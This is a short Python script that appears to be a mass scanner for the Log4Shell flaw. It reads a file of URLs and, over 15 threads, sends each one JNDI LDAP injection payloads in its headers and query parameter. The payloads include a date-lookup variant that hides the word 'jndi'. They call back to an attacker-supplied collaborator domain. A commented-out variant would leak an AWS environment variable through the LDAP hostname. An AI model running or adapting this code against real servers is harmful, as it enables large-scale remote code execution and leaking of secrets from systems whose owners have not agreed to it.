sherlock-exploit.py

from sys import argv
from requests import get
from urllib3 import disable_warnings
from concurrent.futures import ThreadPoolExecutor

disable_warnings()

proxies = {}
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

def sendDetectionRequest(url, ident):
    try:
        payload = "${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://" + str(ident) + "." + argv[2] + "/a}"
        agent ='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'
        payload1 = '${jndi:ldap://'+ str(ident) + '.' + argv[2] + '/udhay}'
#        payload2 = '${jndi:ldap://${env:AWS}'+str(urlId)+'.'+ argv[2] + '/a}'
        params = {'id':payload1}
        headers = {'User-Agent':agent, 'Referer':payload1, 'X-Forwarded-For':payload1}
        url = url.strip()
        print('[{}] Testing {}'.format(ident, url))
        get('https://'+url, headers=headers, params=params, verify=False, proxies=proxies, timeout=10)
    except Exception as e:
        print(e)
        pass

threads = []
urlId = 0
if len(argv) > 1:
    urlFile = open(argv[1], 'r')
    urlList = urlFile.readlines()
    with ThreadPoolExecutor(max_workers=15) as executor:
        for url in urlList:
            urlId += 1
            ident = url[0:10]
            threads.append(executor.submit(sendDetectionRequest, url, ident))
else:
    print('[!] Syntax: python3 {} <urlFile> <collaboratorPayload>'.format(argv[0]))